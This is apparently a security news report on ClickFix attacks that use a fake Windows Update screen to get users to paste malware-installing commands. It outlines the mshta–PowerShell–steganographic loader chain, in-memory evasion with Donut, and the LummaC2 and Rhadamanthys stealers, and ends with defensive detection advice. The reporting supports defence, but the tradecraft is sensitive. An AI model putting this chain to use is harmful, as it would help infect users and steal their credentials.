Security researchers have observed variants of the ClickFix social‑engineering attack that present a full‑screen, realistic Windows Update animation in a browser to trick users into pasting and executing commands that install malware.
The lure instructs victims to press a specific key sequence that triggers JavaScript on the page to copy attacker commands to the clipboard and paste them into the Windows Run box or a command prompt. The technique builds on previously seen ClickFix “human verification” tricks and has been widely adopted by cybercriminals, researchers said.
According to a technical analysis, the multi‑stage attacks use the native mshta binary to run malicious JavaScript, then chain PowerShell and a .NET component called the Stego Loader to reconstruct a final payload that is hidden inside a PNG image and stored as an AES‑encrypted resource. Huntress researchers explain that the malicious code is encoded directly in pixel data and is reconstructed and decrypted in memory.
Huntress said the campaigns employ additional evasion and in‑memory execution techniques, including a ctrampoline tactic that calls thousands of empty functions and the use of the Donut tool to execute extracted shellcode and assemblies in memory. In samples recovered by the researchers, the final payloads included the LummaC2 and Rhadamanthys infostealers.
The Rhadamanthys variant that used the Windows Update lure was first spotted by researchers in October. Huntress reported that a law enforcement operation in mid‑November disrupted parts of the operators’ infrastructure and that payload delivery from the fake Windows Update domains stopped, though the domains remain active.
To mitigate this threat, Huntress recommended disabling the Windows Run box and monitoring for suspicious process chains such as explorer.exe spawning mshta.exe or PowerShell, and checking the RunMRU registry key during incident response.